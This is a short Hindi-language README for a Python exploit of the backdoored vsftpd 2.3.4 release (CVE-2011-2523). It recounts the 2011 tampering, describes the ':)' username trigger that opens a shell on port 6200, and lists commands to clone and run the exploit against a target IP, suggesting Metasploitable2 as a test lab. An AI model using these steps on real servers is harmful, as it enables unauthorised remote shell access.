
vsftpd 2.3.4 के लिए Python एक्सप्लॉइट - बैकडोर कमांड निष्पादन
Very Secure FTP Daemon (vsftpd) एक एफ़टीपी सर्वर है जो यूनिक्स-जैसे प्लेटफार्मों के लिए है, जिसमें लिनक्स भी शामिल है। यह GNU जनरल पब्लिक लाइसेंस की शर्तों के तहत वितरित किया जाता है। यह IPv6 के साथ-साथ SSL का भी समर्थन करता है।
जुलाई 2011 में यह पता चला था कि vsftpd संस्करण 2.3.4, जिसे मास्टर साइट से डाउनलोड किया जा सकता था, से छेड़छाड़ की गई थी। उपयोगकर्ता हैक किए गए vsftpd-2.3.4 सर्वर में लॉगिन करके यूज़रनेम के रूप में :) स्माइली चेहरा दर्ज करके पोर्ट 6200 पर एक कमांड शेल प्राप्त कर सकते हैं। यह vsftpd में कोई सुरक्षा दोष नहीं था; बल्कि, किसी ने vsftpd का एक अलग संस्करण अपलोड किया था जिसमें एक बैकडोर था। तब से साइट को Google App Engine पर स्थानांतरित कर दिया गया है।
sudo apt update
sudo apt install python3
sudo apt install python3-pip
pip install argparse
git clone https://github.com/Lynk4/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.py
python3 exploit.py -host Target_IP

आप Metasploitable2 पर शोषण का परीक्षण कर सकते हैं।